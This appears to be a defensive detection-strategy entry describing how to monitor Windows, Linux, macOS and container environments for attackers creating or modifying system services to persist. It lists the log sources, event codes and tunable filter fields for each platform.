Detects command-line or API-based creation/modification of Windows Services via sc.exe, powershell.exe, services.exe, or ChangeServiceConfig. Looks for creation/modification of autostart services via registry changes, file drops to System32\services, and anomalous parent-child process trees.
| Data Component | Name | Channel |
|---|---|---|
| Service Creation (DC0060) | WinEventLog:Security | EventCode=4697 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Windows Registry Key Modification (DC0063) | WinEventLog:Sysmon | EventCode=13 |
| Field | Description |
|---|---|
| ServiceNamePattern | Regex patterns to flag unusual service names or binaries |
| ParentProcessFilter | List of non-administrative processes starting service management tools |
| RegistryPathList | Monitored autorun locations (e.g., `HKLM\System\CurrentControlSet\Services`) |
Detects creation or modification of systemd service units, addition of cron jobs that invoke binaries on boot, or suspicious writes to /etc/init.d/. Monitors chmod +x and systemctl execution paths, especially from non-root parent processes.
| Data Component | Name | Channel |
|---|---|---|
| File Modification (DC0061) | auditd:SYSCALL | write or rename to /etc/systemd/system or /etc/init.d |
| Command Execution (DC0064) | auditd:SYSCALL | execution of systemctl or service with enable/start/modify |
| Field | Description |
|---|---|
| ServicePathRegex | Path-based filters to identify service unit files or init scripts |
| UserContextList | List of expected user contexts that normally perform service changes |
| CommandNameList | Binaries used to register/modify services |
Detects creation or modification of LaunchDaemon or LaunchAgent plist files under /Library/LaunchDaemons/, ~/Library/LaunchAgents/, or similar. Monitors execution of launchctl, property list edits, and file permission changes.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | macos:unifiedlog | launchctl load/unload or plist file modification |
| File Modification (DC0061) | fs:fsusage | file write to launchd plist paths |
| Field | Description |
|---|---|
| PlistPathList | Watched directories for LaunchDaemons and LaunchAgents |
| PlistKeyMonitor | Monitored keys such as `RunAtLoad`, `KeepAlive`, or `ProgramArguments` |
| UnsignedBinaryAlert | Flag execution of unsigned or non-Apple-signed binaries within plist |
Detects creation of new container system processes via docker run --restart, kubectl exec to init containers, or modification of container init specs. Flags container images that override entrypoints to embed persistence behaviors.
| Data Component | Name | Channel |
|---|---|---|
| Container Creation (DC0072) | docker:events | docker run with restart=always or modifying init |
| File Modification (DC0061) | auditd:SYSCALL | modification of entrypoint scripts or init containers |
| Field | Description |
|---|---|
| EntrypointOverridePattern | Patterns used to detect modified container start scripts |
| RestartPolicyMatch | Policy values triggering alert (e.g., always, on-failure) |
| KubeInitModPath | Path filters for `/etc/init.d/`-like behaviors inside containers |